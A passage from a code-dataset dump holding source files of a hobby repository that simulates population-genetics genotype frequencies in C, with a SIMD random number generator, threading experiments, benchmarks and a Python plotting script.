"is_vendor": false,
"language": "C",
"length_bytes": 1280,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 36,
"path": "/thread_testing.c",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "#include <pthread.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nstruct threadinfo {\n int thresh_aa;\n int thresh_ab;\n int thresh_bb;\n int nextMembers; // number of members to generate on each pass\n int **results;\n int *alldone;\n};\n\nvoid * pthread_handler(void* args){\n // Args should consist as follows: int thresh_aa, int thresh_ab, int thresh_bb, int nextMembers, int **results, int *alldone\n struct threadinfo myinfo = *(struct threadinfo*)args;\n printf(\"thresholds: aa: %d ab: %d bb: %d\\n\",myinfo.thresh_aa,myinfo.thresh_ab,myinfo.thresh_bb);\n printf(\"Generating %d members per generation\\n\",myinfo.nextMembers);\n printf(\"Results is %p and alldone is %p\\n\",myinfo.results,myinfo.alldone);\n sleep(2);\n return (void *)&myinfo;\n}\n\nint main(){\n int **results = malloc(1000*sizeof(int)*4);\n int *alldone = malloc(4*sizeof(int));\n struct threadinfo tinfo = {.thresh_aa = 18072, .thresh_ab = 51029, .thresh_bb = 65536, .results = results, .alldone = alldone, .nextMembers = 24522};\n pthread_t thread;\n int tErr;\n printf(\"about to call pthread_create\\n\");\n tErr = pthread_create(&thread , NULL, pthread_handler, (void *)&tinfo);\n pthread_join(thread, NULL);\n printf(\"finished join\\n\");\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6563364863395691,
"alphanum_fraction": 0.6906474828720093,
"avg_line_length": 28.62295150756836,
"blob_id": "97ee7cf912da53dc5c2fda2674eb511c2c0c7af6",
"content_id": "2c9e8a47f3580900e5979ac18e803221190daa6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1807,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 61,
"path": "/generations_controller.py",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "import subprocess\nimport threading\nimport random\nimport string\nimport os\nfrom os.path import expanduser\nimport sys\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\n\ndef auto_plot(num_generations,num_organisms,fifoname=None):\n\n\tif fifoname == None:\n\t\tfifoname = ''.join([random.choice(string.ascii_letters) for a in range(10)])\n\targs = [os.getcwd() + \"/bio\",str(num_organisms),str(num_generations),fifoname]\n\tthreading.Thread(target=subprocess.run,args=(args,)).start()\n\n\tnum_frames = int(num_generations/100)\n\tprint(f\"Running for {num_frames} frames\")\n\tresults = [[np.nan]*num_frames,[np.nan]*num_frames,[np.nan]*num_frames] # [[aa1,aa2...],[ab],[bb]]\n\n\n\tdef animate(i):\n\t\tnonlocal results\n\t\tprint(\"Ran animate\")\n\n\t\tresult = file.readline()\n\t\tif result == \"\":\n\t\t\treturn\n\t\tresult = [int(a.split(\":\")[1])/num_organisms*100 for a in result.split(\"\\t\")]\n\t\tresults[0][i//100] = result[0]\n\t\tresults[1][i//100] = result[1]\n\t\tresults[2][i//100] = result[2]\n\t\tprint(f\"{results}\")\n\n\t\taa_line.set_ydata(results[0])\n\t\tab_line.set_ydata(results[1])\n\t\tbb_line.set_ydata(results[2])\n\n\t\treturn (aa_line,ab_line,bb_line)\n\n\tfig, ax = plt.subplots()\n\tax.set_xlim(0,num_generations)\n\tax.set_ylim(0,100)\n\taa_line, = ax.plot([a for a in range(0,num_generations,100)], [np.nan for a in range(num_frames)], \\\n\t\tanimated=True,label=\"aa\")\n\tab_line, = ax.plot([a for a in range(0,num_generations,100)], [np.nan for a in range(num_frames)], \\\n\t\tanimated=True,label=\"ab\")\n\tbb_line, = ax.plot([a for a in range(0,num_generations,100)], [np.nan for a in range(num_frames)], \\\n\t\tanimated=True,label=\"bb\")\n\tax.legend()\n\tfile = open(fifoname,'r')\n\n\tani = FuncAnimation(fig, animate, frames=range(0,num_generations,100), interval=200)\n\n\tos.unlink(fifoname)\n\nauto_plot(1000,65536)\n"
},
{
"alpha_fraction": 0.56175297498703,
"alphanum_fraction": 0.620185911655426,
"avg_line_length": 34.296875,
"blob_id": "1b4713116124059ea4df8a288fd758fa98f0c2c4",
"content_id": "f005190416d8c2fa72b723e624d827f15fb2d38c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2259,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 64,
"path": "/test_rand_speed.c",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "#include <stdlib.h>\n#include <sys/time.h>\n#include <stdio.h>\n#include <x86intrin.h>\n#include <string.h>\n#include \"fast_rand.h\"\n\n// This must be compiled with -Ofast because otherwise when you call FastRand it fetches the parameters from the struct each time\n\nint main(int argc, char **argv){\n struct timeval start;\n struct timeval end;\n\n void * random_buffer = malloc(1000000);\n long long unsigned int * long_random_buffer = (long long unsigned int *) random_buffer;\n int * int_random_buffer = (int *) random_buffer;\n unsigned short n = 0; // overflows every 65536, so no problem.\n srandomdev();\n gettimeofday(&start,NULL);\n unsigned long start_t = 1000000 * start.tv_sec + start.tv_usec;\n\n for (int i = 0; i < 125000000; i++) {\n _rdrand64_step(long_random_buffer+n);\n }\n\n gettimeofday(&end,NULL);\n unsigned long end_t = 1000000 * end.tv_sec + end.tv_usec;\n printf(\"It took %ld microseconds to generate 1 GB using rdrand(). \",end_t-start_t);\n printf(\"This is equivalent to %ld bytes/microsecond\\n\",1000000000/(end_t-start_t));\n gettimeofday(&start,NULL);\n start_t = 1000000 * start.tv_sec + start.tv_usec;\n\n for (int i = 0; i < 250000000; i++) {\n int_random_buffer[n] = random();\n n += 1;\n }\n\n gettimeofday(&end,NULL);\n end_t = 1000000 * end.tv_sec + end.tv_usec;\n printf(\"It took %ld microseconds to generate 1 GB using random(). \",end_t-start_t);\n printf(\"This is equivalent to %ld bytes/microsecond\\n\",1000000000/(end_t-start_t));\n gettimeofday(&start,NULL);\n start_t = 1000000 * start.tv_sec + start.tv_usec;\n\n n = 0;\n fastrand f = InitFastRand();\n for (int i = 0; i < 62500000; i++){\n FastRand(&f);\n int_random_buffer[n] = f.res[0];\n n += 1;\n int_random_buffer[n] = f.res[1];\n n += 1;\n int_random_buffer[n] = f.res[2];\n n += 1;\n int_random_buffer[n] = f.res[3];\n n += 1;\n }\n free(random_buffer);\n gettimeofday(&end,NULL);\n end_t = 1000000 * end.tv_sec + end.tv_usec;\n printf(\"It took %ld microseconds to generate 1 GB random bytes using FastRand(). \",end_t-start_t);\n printf(\"This is equivalent to %ld bytes/microsecond\\n\",1000000000/(end_t-start_t));\n return 0;\n}\n"
},
{
"alpha_fraction": 0.5722113847732544,
"alphanum_fraction": 0.6037326455116272,
"avg_line_length": 39.6865348815918,
"blob_id": "e96cac0268a07cda9937544d05cce72eb67eb489",
"content_id": "83d5ba3113bc82bd5c77e7cc5b0833ea4142be04",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 18432,
"license_type": "no_license",
"max_line_length": 261,
"num_lines": 453,
"path": "/generations.c",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "\n#include <stdlib.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/time.h>\n#include <time.h>\n#include <errno.h>\n#include <string.h>\n#include <pthread.h>\n#include <semaphore.h>\n#include <x86intrin.h>\n#include <sys/stat.h>\n\n#include \"fast_rand.h\"\n\n// Benchmark as of 3/20: (microseconds / generation of 65536)\n// 1284, 1268, 1296, 1273, 1294. Average 1283 microseconds/generation (while doing stuff in the background)\n// Benchmark as of \"no bugs, working version\" ~= 1250. I benchmarked 1247 and then 1250 while doing nothing\n// After optimizations: 1160, 1115, 1094\n// 3/27 replacement of rand function with FastRand() gives us 1005\n// 3/27 replacing reading from /dev/random with seeding random() from /dev/random and then using random() saved 15 microseconds / generation\n// 8/20 - with clang, on dad's newer computer, 850 microseconds/generation. Replace clang with GCC,\n// 600 microseconds/generation.\n// Moved decision making on whether to have one parent or two from in the core logic to outside,\n// And instead of doing individual &s for individual decisions, group them all together in popcnts.\n// Also, probably get some kind of microcode loop optimization potential. ~380 microseconds/generation\n\n// Todo: multithreading. Only two cores so not much potential.\n// Maybe you could have a random number generating core and a decision core\n\nstruct threadinfo {\n int thresh_aa;\n int thresh_ab;\n int thresh_bb;\n int next_members; // number of members to generate on each pass\n int num_generations;\n unsigned int *results;\n int *alldone;\n sem_t *semaphore;\n int thread_id;\n};\n\n\nvoid progress_generation(int thresh_aa, int thresh_ab, int thresh_bb, int next_members, int* result){\n \n // 0 | thresh_aa | thresh_ab | end = thresh_bb\n#ifdef DEBUG\n printf(\"Thresholds: %d %d %d\\t\",thresh_aa,thresh_ab,thresh_bb);\n printf(\"AA has size: %d. AB has size %d. BB has size %d\\n\",thresh_aa,thresh_ab-thresh_aa,thresh_bb-thresh_ab);\n \n int from_first[5] = {0,0,0,0,0};\n int from_second[4] = {0,0,0,0};\n \n int from_second_first[4] = {0,0,0,0};\n int from_second_second[4] = {0,0,0,0};\n int from_second_third[4] = {0,0,0,0};\n int second_outputs[2] = {0,0};\n \n short *secondIndexes = (short *)malloc(35000*sizeof(short));\n \n int num_first = 0;\n int num_second = 0;\n \n struct timeval start;\n struct timeval end;\n gettimeofday(&start,NULL);\n#endif\n \n int counts[5] = {0,0,0,0,0};\n if (next_members != 65536){\n \tdouble offset = 65536/next_members;\n \tthresh_aa *= offset;\n \tthresh_ab *= offset;\n \tthresh_bb *= offset;\n \tprintf(\"next_members != 65536\\n\");\n }\n \n fastrand rand_index = InitFastRand();\n fastrand rand_choice = InitFastRand();\n\t/*\n\t* This is a little bit complicated. In the old way, the choice over whether to have both bits\n\t* come from one parent or not was made more or less on the fly, which costs a shr and most \n\t* importantly, an evil evil branch on every iteration. This branch was so awful because if the\n\t* random number generator is good, it is unpredictable, which means you have a branch miss half\n\t* of the time. Instead, we can refactor the decision making so it happens up here. What that means\n\t* is that we decide ahead of time how many have both bits come from one parent and how many\n\t* have one bit from each parent. This means that we don't have a branch in a loop here - there's\n\t* only the loop branch, which should have >99% prediction. 
This should make the code much faster.\n\t*/\n    int both_one_parent = 0;\n    for (int i = 0; i < (next_members>>7); i += 1){ // FastRand is 128 bits = 2^7 members per fastrand\n    \tFastRand(&rand_choice);\n    \tboth_one_parent += __builtin_popcountll(* (rand_choice.res)) + \n    \t\t\t\t\t   __builtin_popcountll(* (rand_choice.res+2)); // hopefully the compiler gets it\n    }\n//    both_one_parent = 0;\n#ifdef DEBUG\n    num_first = both_one_parent;\n    num_second = next_members-both_one_parent;\n    printf(\"%d first and %d second.\\n\",num_first,num_second);\n#endif\n/*    int one_parent = (both_one_parent >> 3) << 3;\n    int two_parents = ((next_members-both_one_parent)>>2) << 3;\n    one_parent += (one_parent+two_parents - next_members); // Fixes next_members change*/\n    unsigned short *short_res = (unsigned short *)rand_index.res;\n    // normally rand_index.res would be typed as an int *, though really it's a 128 bit register\n    // location. Unsigned shorts cover the 0-65536 range. I could handle ints also, but it would be\n    // something like half as fast.\n\n    // For ones where both bits come from one parent\n    for (int i = 0; i < (both_one_parent>>3); i++){\n    \tFastRand(&rand_index);\n    \tfor (int k = 0; k < 8; k++){\n    \t\tunsigned short firstIndex = short_res[k];\n    \t\tcounts[(firstIndex < thresh_aa) + (firstIndex < thresh_ab)] += 1;\n    \t\t// 0 = bb, 1 = ab, 2 = aa\n#ifdef DEBUG\n\t\t\tfrom_first[(firstIndex < thresh_aa) + (firstIndex < thresh_ab)] += 1;\n#endif\n    \t}\n    }\n    counts[3] = counts[0];\n    counts[0] = counts[2];\n    counts[2] = 0;\n    // Counts output: 0: aa 1: ab 2: ab 3: bb 4: bb , so we have to fiddle around a bit\n    int two_parents = next_members - both_one_parent;\n    for (int i = 0; i < (two_parents>>2); i++) {\n    \t// >> 2 and not 3 because the cycle only gives 4 results, not 8, because it needs 32 bits\n    \tFastRand(&rand_index);\n    \tfor (int k = 0; k < 8; k++){\n    \t\tunsigned short firstIndex = short_res[k];\n    \t\tk++;\n    \t\tunsigned short secondIndex = short_res[k];\n    \t\tchar allele = 0;\n    \n        // Three tests for first bit: firstIndex > thresh_ab in which case it's 1. firstIndex < thresh_aa in which case it's 0. thresh_aa < firstIndex < thresh_ab 50% chance\n        if (firstIndex > thresh_ab) { // if it's a bb, then both alleles are b so result is b\n            allele = 1;\n        }\n        else if (firstIndex > thresh_aa) {\n            allele = secondIndex&1;\n        }\n        \n    \t#ifdef DEBUG\n        second_outputs[allele] += 1;\n    \t#endif\n        \n        if (secondIndex > thresh_ab) { // We know second one is BB\n            counts[allele+2] += 1;\n\n    \t\t#ifdef DEBUG\n        \tfrom_second[allele+2] += 1;\n            from_second_first[allele+2] += 1; // Occur 1/4 of the time and be 1/2 2 and 1/2 3\n    \t\t#endif\n        }\n        \n        else if (secondIndex > thresh_aa) { // Second one is AB\n            counts[allele+(firstIndex&2)] += 1; // This used to be firstIndex. This caused an insidious bug where aa and bb were relatively favored 10:12:10 when they should be 8:16:8\n            // This used to be allele+secondIndex&2 and the &2 operated after the + so it was always 0 or 2\n    \t\t#ifdef DEBUG\n            from_second[allele+(firstIndex&2)] += 1;\n            from_second_second[allele + (firstIndex&2)] += 1; // Should encounter 0 50% of time and 1 50% of time and give 2 50% of time and 0 50% of time. 
Should be 25% for all\n \t\t#endif\n }\n \n else { // second one is AA\n counts[allele] += 1;\n \t\t#ifdef DEBUG\n from_second[allele] += 1;\n from_second_third[allele] += 1;\n \t\t#endif\n }\n \t}\n }\n \n#ifdef DEBUG\n from_second[1] += from_second[2];\n from_second[2] = from_second[3];\n // aa: 0, \n gettimeofday(&end,NULL);\n printf(\"Took %ld microseconds to progress generation\\n\",(1000000 * end.tv_sec + end.tv_usec) - (1000000 * start.tv_sec + start.tv_usec));\n printf(\"From first aa: %d from second %d. From first ab: %d from second: %d. From first bb: %d from second %d\\n\",from_first[0],from_second[0],from_first[2],from_second[1],from_first[4],from_second[2]);\n#ifndef THREADED\n printf(\"First was chosen %d times. Second was chosen %d times\\n\",num_first,num_second);\n printf(\"From second started with 0 %d times and 1 %d times\\n\",second_outputs[0],second_outputs[1]);\n printf(\"From second first:\\t%d %d %d %d\\n\",from_second_first[0],from_second_first[1],from_second_first[2],from_second_first[3]);\n printf(\"From second second:\\t%d %d %d %d\\n\",from_second_second[0],from_second_second[1],from_second_second[2],from_second_second[3]);\n printf(\"From second third:\\t%d %d %d %d\\n\",from_second_third[0],from_second_third[1],from_second_third[2],from_second_third[3]);\n printf(\"0: %d, 1: %d, 2: %d 3: %d\\n\",counts[0],counts[1],counts[2],counts[3]);\n#endif\n#endif\n // 0: aa 1: ab 2: ab 3: bb 4: bb\n result[0] = counts[0]; // aa\n result[1] = counts[1] + counts[2]; // ab\n result[2] = counts[3] + counts[4]; // bb\n}\n\nvoid * pthread_handler(void* args){\n struct threadinfo myinfo = *(struct threadinfo*)args;\n int thresh_aa = myinfo.thresh_aa;\n int thresh_ab = myinfo.thresh_ab;\n int thresh_bb = myinfo.thresh_bb;\n int num_generations = myinfo.num_generations;\n int next_members = myinfo.next_members;\n unsigned int *results = myinfo.results;\n int *alldone = myinfo.alldone;\n int thread_id = myinfo.thread_id;\n sem_t *semaphore = myinfo.semaphore;\n \n int total_members_per_generation = 65536; // This should be a component of the struct\n int timeslept = 0;\n int preliminary_results[3] = {0,0,0};\n \n for (int i = 0; i < num_generations; i++){\n#ifdef DEBUG\n printf(\"loop_start thread %d generation %d\\n\",thread_id,i);\n#endif\n progress_generation(thresh_aa,thresh_ab,thresh_bb,next_members,preliminary_results);\n#ifdef DEBUG\n printf(\"wait_start %d\\n\",thread_id);\n#endif\n sem_wait(semaphore); // This has to be done for results to be consistent. Hopefully it isn't too slow.\n results[0] += preliminary_results[0];\n results[1] += preliminary_results[1];\n results[2] += preliminary_results[2];\n sem_post(semaphore);\n \n#ifdef DEBUG\n printf(\"results %d: %d %d %d\\tTotal is %d\\n\",thread_id,preliminary_results[0],preliminary_results[1],preliminary_results[2],results[0] + results[1] + results[2]);\n#endif\n \n while ((results[0] + results[1] + results[2]) != total_members_per_generation){\n struct timespec time_to_sleep = {.tv_sec = 0, .tv_nsec = 20000}; // 20 microseconds isn't too bad\n nanosleep(&time_to_sleep, NULL);\n }\n thresh_aa = results[0];\n thresh_ab = thresh_aa + results[1];\n thresh_bb = thresh_ab + results[2];\n results += 3;\n#ifdef DEBUG\n printf(\"end loop thread %d. aa: %d ab: %d bb: %d\\n\",thread_id,thresh_aa,thresh_ab,thresh_bb);\n#endif\n }\n \n printf(\"Thread %d is ending. 
num_generations is %d.\\n\",thread_id,num_generations);\n pthread_exit(args);\n}\n\nvoid initialize_generation(int number, int* gen){ // 14 milliseconds faster on generating 1.6 million organisms lol. 224 organisms / microsecond is good\n // AA consistently has ~17.5k while BB consistently has ~15k.\n // This is equivalent to a normal distribution. There's probably some normal distribution function I could use that's faster.\n int num_aa = 0;\n int num_ab = 0;\n int num_bb = 0;\n \n struct timeval start;\n struct timeval end;\n gettimeofday(&start,NULL);\n \n for (int i = 0;i < number/8; i++){ // 8 instead of 16 because the upper bit is always 0.\n // It would be more efficient to make this 15 or something but who cares\n int n = random();\n \n #pragma clang loop unroll(full)\n for (int j = 0; j < 8; j++){ // This needs to be unrolled\n char organism = n & 3;\n if (organism == 0){\n num_aa += 1;\n }\n else if (organism == 3){\n num_bb += 1;\n }\n else {\n num_ab += 1;\n }\n n >>= 2;\n }\n }\n \n gettimeofday(&end,NULL);\n \n#ifdef DEBUG\n printf(\"Took %ld microseconds to generate new generation with %d aa, %d ab, and %d bb\\n\",(1000000 * end.tv_sec + end.tv_usec) - (1000000 * start.tv_sec + start.tv_usec),num_aa,num_ab,num_bb);\n#endif\n \n gen[0] = num_aa;\n gen[1] = num_ab;\n gen[2] = num_bb;\n}\n\nvoid fill_random_state_buffers(){\n\tint fd = open(\"/dev/urandom\",O_RDONLY);\n\tchar * buffer = malloc(256+4);\n\tread(fd,buffer,256+4);\n\tclose(fd);\n\tunsigned int seed = (unsigned int) *buffer;\n\tbuffer += 4;\n\tinitstate(seed,buffer,256);\n}\n\nint main(int argc, char **argv){\n int num_organisms = 0;\n int num_generations = 0;\n if (argc < 3){\n num_organisms = 65536;\n#ifdef DEBUG\n num_generations = 5;\n#endif\n#ifdef SPEEDTEST\n num_generations = 1000;\n#endif\n }\n else {\n num_organisms = atoi(argv[1]);\n num_generations = atoi(argv[2]);\n if (__builtin_popcount(num_organisms) != 1){\n \tprintf(\"num_organisms must be a multiple of 2\\n\");\n \texit(1);\n }\n }\n#ifndef SPEEDTEST\n printf(\"Simulating %d organisms for %d generations\\n\",num_organisms,num_generations);\n#endif\n srandomdev(); // Seeds random() using information from /dev/random\n int initial_values[3];\n initialize_generation(num_organisms,initial_values);\n int thresh_aa = initial_values[0];\n int thresh_ab = thresh_aa + initial_values[1];\n int thresh_bb = thresh_ab + initial_values[2];\n int **results = (int **) malloc(num_generations*3*sizeof(int));\n int result[3] = {0,0,0}; \n#ifdef THREADED\n unsigned int *thread_results = malloc(num_generations*sizeof(int)*3);\n memset(thread_results, 0, num_generations*sizeof(int)*3); // Sometimes it has random pieces of data. 
It shouldn't and this is an easy way to fix that.\n int alldone = 0;\n sem_t *semaphore;\n if ((semaphore = sem_open(\"/semaphore\", O_CREAT, 0644, 1)) == SEM_FAILED ) { // from https://heldercorreia.com/semaphores-in-mac-os-x-fd7a7418e13b\n perror(\"sem_open\");\n exit(EXIT_FAILURE);\n }\n pthread_t threads[4];\n pthread_t thread;\n int thread_err;\n struct threadinfo tinfo = {.thresh_aa = thresh_aa, .thresh_ab = thresh_ab, .thresh_bb = thresh_bb, .num_generations = num_generations, .results = thread_results, .alldone = &alldone, .next_members = num_organisms>>2, .semaphore = semaphore, .thread_id = 0};\n for (int i = 0; i < 4; i++){\n void * thread_info = malloc(sizeof(tinfo));\n tinfo.thread_id = i;\n memcpy(thread_info,(void *)&tinfo,sizeof(tinfo)); // So we can have thread specific data, specifically thread_id\n \n thread_err = pthread_create(&thread , NULL, pthread_handler, thread_info);\n if (thread_err != 0){\n printf(\"error in thread creation: %d\\n\",thread_err);\n }\n threads[i] = thread;\n }\n int generation = 0;\n struct timeval start;\n struct timeval end;\n gettimeofday(&start,NULL);\n int k = num_generations * 3;\n int time_taken;\n struct timespec one_second = {.tv_sec = 1, .tv_nsec = 0};\n nanosleep(&one_second, NULL);\n for (int i = 0; i < k; i += 3){\n while (thread_results[i] + thread_results[i+1] + thread_results[i+2] != num_organisms){\n gettimeofday(&end,NULL);\n time_taken = (1000000 * end.tv_sec + end.tv_usec) - (1000000 * start.tv_sec + start.tv_usec);\n printf(\"Results for generation %d: %d %d %d\\n\",i/3,thread_results[i],thread_results[i+1],thread_results[i+2]);\n printf(\"Took %d microseconds to go %d generations, %d microseconds/generation\\n\",time_taken,i/3,time_taken*3/i);\n nanosleep(&one_second, NULL);\n }\n }\n while (1){\n \n }\n return 0;\n#else\n#ifdef DEBUG\n for (int i = 0; i < num_generations; i++){\n progress_generation(thresh_aa, thresh_ab, thresh_bb, num_organisms,result);\n printf(\"aa: %d ab: %d bb: %d\\n\",result[0],result[1],result[2]);\n thresh_aa = result[0];\n thresh_ab = thresh_aa + result[1];\n thresh_bb = thresh_ab + result[2];\n results[i] = result;\n }\n#else\n#ifdef SPEEDTEST\n int time_takens[20];\n int average = 0;\n for (int i = 0;i < 20; i++){\n struct timeval start;\n struct timeval end;\n gettimeofday(&start,NULL);\n for (int j = 0; j < 1000; j++) {\n progress_generation(thresh_aa, thresh_ab, thresh_bb, num_organisms, result);\n thresh_aa = result[0];\n thresh_ab = thresh_aa + result[1];\n thresh_bb = thresh_ab + result[2];\n }\n gettimeofday(&end,NULL);\n int time_taken = (1000000 * end.tv_sec + end.tv_usec) - (1000000 * start.tv_sec + start.tv_usec);\n printf(\"%d microseconds\\t\",time_taken);\n printf(\"aa: %d\\tab:%d\\tbb:%d\\n\",result[0],result[1],result[2]);\n time_takens[i] = time_taken;\n average += time_taken;\n \n initialize_generation(num_organisms,initial_values);\n thresh_aa = initial_values[0];\n thresh_ab = thresh_aa + initial_values[1];\n thresh_bb = thresh_ab + initial_values[2];\n }\n printf(\"Took on average %d microseconds per 1000 generationss or %d microseconds per generation\\n\",average/20,average/20000);\n#else\n char *fifoname = \"results\";\n if (argc == 4){\n fifoname = argv[3];\n }\n \n if (mkfifo(fifoname, 0777) == -1){\n printf(\"Failure in making fifo: %s\\n\",strerror(errno));\n }\n \n int fd = open(fifoname, O_WRONLY);\n \n printf(\"Writing results to FIFO device %s with fd %d\\n\",fifoname,fd);\n char *format_string = \"aa: %d\\tab:%d\\tbb:%d\\n\";\n char *write_string = (char *) 
malloc(200);\n \n for (int i = 0; i < num_generations/100; i++){\n for (int j = 0; j < 100; j++) {\n progress_generation(thresh_aa, thresh_ab, thresh_bb, num_organisms,result);\n thresh_aa = result[0];\n thresh_ab = thresh_aa + result[1];\n thresh_bb = thresh_ab + result[2];\n results[i*100 + j] = result;\n }\n int string_length = sprintf(write_string, format_string, result[0], result[1], result[2]);\n write(fd, write_string, string_length);\n if (result[0] == 0 || result[2] == 0){ // Totally shifted to one side or the other\n for (int j = i; j < num_generations/100; j++){\n write(fd, write_string, string_length);\n }\n break;\n }\n }\n close(fd);\n#endif\n#endif\n#endif\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6305555701255798,
"alphanum_fraction": 0.6583333611488342,
"avg_line_length": 28.189189910888672,
"blob_id": "b64ccd459e4be3fe70a8d3ef54134b47ec03aadc",
"content_id": "00aabebccee9d56f59f8967b8d8906f4e135ee37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1080,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 37,
"path": "/semaphore_testing.c",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "#include <pthread.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <semaphore.h>\n\nsem_t mutex;\n\nstruct threadinfo {\n int thresh_aa;\n int thresh_ab;\n int thresh_bb;\n int next_members; // number of members to generate on each pass\n int num_generations;\n int *results;\n};\n\nvoid * pthread_handler(void* args){\n // Args should consist as follows: int thresh_aa, int thresh_ab, int thresh_bb, int nextMembers, int **results, int *alldone\n struct threadinfo myinfo = *(struct threadinfo*)args;\n sem_wait(&mutex);\n printf(\"Got mutex\\n\");\n sem_post(&mutex);\n return args;\n}\n\nint main(){\n int *results = malloc(1000*sizeof(int)*4);\n struct threadinfo tinfo = {.thresh_aa = 18072, .thresh_ab = 51029, .thresh_bb = 65536, .results = results, .num_generations = 1000, .next_members = 24522};\n pthread_t thread;\n int tErr;\n printf(\"about to call pthread_create\\n\");\n tErr = pthread_create(&thread , NULL, pthread_handler, (void *)&tinfo);\n pthread_join(thread, NULL);\n printf(\"finished join\\n\");\n return 0;\n}\n"
},
{
"alpha_fraction": 0.43916448950767517,
"alphanum_fraction": 0.5383812189102173,
"avg_line_length": 22.35365867614746,
"blob_id": "46017ead15999dfa2eb194c5809c20f72fade7d0",
"content_id": "b250d6cddfa1d859f016d3012d43923796ca5f8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1915,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 82,
"path": "/fast_rand.h",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "// Stolen from http://www.dimkovic.com/node/22\n\n#include <stdio.h>\n#include <unistd.h>\n#include <string.h>\n#include <fcntl.h>\n#include <errno.h>\n\ntypedef struct fastrand_t {\n \n //\n // MWC1616 data\n \n int a[4];\n int b[4];\n int mask[4];\n int m1[4];\n int m2[4];\n \n //\n // Result (4 32-bit random numbers)\n \n int res[4];\n \n} fastrand;\n\n\nfastrand InitFastRand()\n{\n \n //\n // Initialize MWC1616 masks and multipliers\n // Default values of 18000 and 30903 used\n // for multipliers\n \n fastrand f;\n \n uint8_t i;\n \n for(i=0;i<4;i++) {\n f.mask[i]=0xFFFF;\n f.m1[i]=0x4650;\n f.m2[i]=0x78B7;\n }\n \n f.a[0] = random();\n f.a[1] = random();\n f.a[2] = random();\n f.a[3] = random();\n f.b[0] = random();\n f.b[1] = random();\n f.b[2] = random();\n f.b[3] = random();\n return f;\n}\n\nstatic inline void FastRand(fastrand *f)\n{\n __m128i a = _mm_load_si128((const __m128i *)f->a);\n __m128i b = _mm_load_si128((const __m128i *)f->b);\n \n const __m128i mask = _mm_load_si128((const __m128i *)f->mask);\n const __m128i m1 = _mm_load_si128((const __m128i *)f->m1);\n const __m128i m2 = _mm_load_si128((const __m128i *)f->m2);\n \n __m128i amask = _mm_and_si128(a, mask);\n __m128i ashift = _mm_srli_epi32(a, 0x10);\n __m128i amul = _mm_mullo_epi32(amask, m1);\n __m128i anew = _mm_add_epi32(amul, ashift);\n _mm_store_si128((__m128i *)f->a, anew);\n \n __m128i bmask = _mm_and_si128(b, mask);\n __m128i bshift = _mm_srli_epi32(b, 0x10);\n __m128i bmul = _mm_mullo_epi32(bmask, m2);\n __m128i bnew = _mm_add_epi32(bmul, bshift);\n _mm_store_si128((__m128i *)f->b, bnew);\n \n __m128i bmasknew = _mm_and_si128(bnew, mask);\n __m128i ashiftnew = _mm_slli_epi32(anew, 0x10);\n __m128i res = _mm_add_epi32(ashiftnew, bmasknew);\n _mm_store_si128((__m128i *)f->res, res);\n}\n"
},
{
"alpha_fraction": 0.5660377144813538,
"alphanum_fraction": 0.6037735939025879,
"avg_line_length": 22.1875,
"blob_id": "523529b6f87711e197525571a950995fd4bea4b6",
"content_id": "6a2036da3080ea6e513354f300be34d27cfa6989",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 371,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 16,
"path": "/faster.c",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "#include <x86intrin.h>\n#include \"fast_rand.h\"\n#include <unistd.h>\n\nint main(){\n\tsrandomdev();\n\tshort* shorts = (short *) malloc(sizeof(short)*10000);\n\tfastrand rand_choice = InitFastRand();\n\tshort * short_res = (short *) rand_choice.res;\n\tfor (int k = 0; k < 1250; k++){\t\n\t\tFastRand(&rand_choice);\n\t\tfor (int i = 0; i < 8; i++){\n\t\t\tprintf(\"%hu\\t\",short_res[i]);\n\t\t}\n\t}\n}\n"
},
{
"alpha_fraction": 0.5477855205535889,
"alphanum_fraction": 0.559440553188324,
"avg_line_length": 24.235294342041016,
"blob_id": "60bf40f8a7ea5a3f4ca2a371e076106141ae02bb",
"content_id": "0b037252d0d8f1cba9254c7d8250bd5b31d68aaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 429,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 17,
"path": "/malloc_test.c",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "#include <stdlib.h>\n#include <stdio.h>\n\nint main(int argc, char **argv){\n if (argc < 2){\n printf(\"Need num_bytes\\n\");\n }\n int num_bytes = atoi(argv[1]);\n printf(\"Reading %d bytes from malloc\\n\",num_bytes);\n unsigned char* result = malloc(num_bytes);\n int sum = 0;\n for (int i = 0; i < num_bytes; i++){\n sum += result[i];\n }\n printf(\"Sum of malloced memory was %d\\n\",sum);\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6749083995819092,
"alphanum_fraction": 0.7298534512519836,
"avg_line_length": 53.599998474121094,
"blob_id": "f8965b2c43032aacf275733d3b585e37d67893de",
